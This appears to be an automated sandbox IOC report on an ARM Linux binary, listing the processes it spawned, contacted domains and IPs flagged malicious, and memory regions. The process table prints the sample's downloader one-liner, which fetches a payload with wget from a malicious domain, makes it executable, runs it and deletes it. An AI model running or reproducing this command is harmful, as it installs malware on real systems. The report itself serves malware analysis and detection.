IOC Report
armv5l.elf

loading gif

Processes

Path
Cmdline
Malicious
/tmp/armv5l.elf
/tmp/armv5l.elf
/tmp/armv5l.elf
-
/bin/sh
/bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."
/bin/sh
-
/usr/bin/wget
wget -q http://gay.energy/.../vivid -O .....
/bin/sh
-
/usr/bin/chmod
chmod 777 .....
/bin/sh
-
/bin/sh
/bin/sh ./.....
/bin/sh
-
/usr/bin/rm
rm -rf .....
/tmp/armv5l.elf
-
/tmp/armv5l.elf
-
/tmp/armv5l.elf
-
/usr/bin/dash
-
/usr/bin/rm
rm -f /tmp/tmp.AuvqT3u8Nb /tmp/tmp.LwYSwGXz30 /tmp/tmp.PqowgKSo5U
/usr/bin/dash
-
/usr/bin/rm
rm -f /tmp/tmp.AuvqT3u8Nb /tmp/tmp.LwYSwGXz30 /tmp/tmp.PqowgKSo5U
There are 8 hidden processes, click here to show them.

Domains

Name
IP
Malicious
gay.energy
unknown
malicious

IPs

IP
Domain
Country
Malicious
92.60.77.69
unknown
Italy
malicious
34.249.145.219
unknown
United States
109.202.202.202
unknown
Switzerland
91.189.91.43
unknown
United Kingdom
91.189.91.42
unknown
United Kingdom

Memdumps

Base Address
Regiontype
Protect
Malicious
7f648c031000
page execute read
malicious
7f648c031000
page execute read
malicious
7f648c031000
page execute read
malicious
558c7493a000
page read and write
7f648c040000
page read and write
558c7493a000
page read and write
7f6592fa7000
page read and write
7f648c040000
page read and write
7f6592dc6000
page read and write
558c74931000
page read and write
558c746e0000
page execute read
7f658bfff000
page read and write
7ffc7323e000
page read and write
558c7694f000
page read and write
558c7694f000
page read and write
7f6592dc6000
page read and write
7f6593139000
page read and write
7f65927ea000
page read and write
7f6593139000
page read and write
558c746e0000
page execute read
7f6592a78000
page read and write
558c76938000
page execute and read and write
7f6592be4000
page read and write
7f6591bee000
page read and write
7f6592fa7000
page read and write
7f648c040000
page read and write
7f6592488000
page read and write
558c74931000
page read and write
7f65930d0000
page read and write
7f6592a78000
page read and write
7f648c039000
page read and write
7f658bfff000
page read and write
7f65930d0000
page read and write
558c7493a000
page read and write
7f6592fa7000
page read and write
7f658c021000
page read and write
7f658c021000
page read and write
7f6593139000
page read and write
558c746e0000
page execute read
558c74931000
page read and write
7ffc7323e000
page read and write
7f65930f4000
page read and write
558c7694f000
page read and write
7f65930f4000
page read and write
7f65923f6000
page read and write
7ffc7333b000
page execute read
7f65930d0000
page read and write
7f6591bee000
page read and write
7f6592488000
page read and write
7f65927ea000
page read and write
7f648c039000
page read and write
7f65923f6000
page read and write
7f65927ea000
page read and write
7f6592a78000
page read and write
7f6591bee000
page read and write
7f6592be4000
page read and write
7f658c021000
page read and write
7f658bfff000
page read and write
7ffc7333b000
page execute read
558c77eb9000
page read and write
7f6592a55000
page read and write
558c76938000
page execute and read and write
558c76938000
page execute and read and write
7f6592a55000
page read and write
558c77eb9000
page read and write
7f6592a55000
page read and write
558c77eb9000
page read and write
7f65930f4000
page read and write
7ffc7323e000
page read and write
7ffc7333b000
page execute read
7f6592be4000
page read and write
7f6592488000
page read and write
7f65923f6000
page read and write
7f648c039000
page read and write
7f6592dc6000
page read and write
There are 65 hidden memdumps, click here to show them.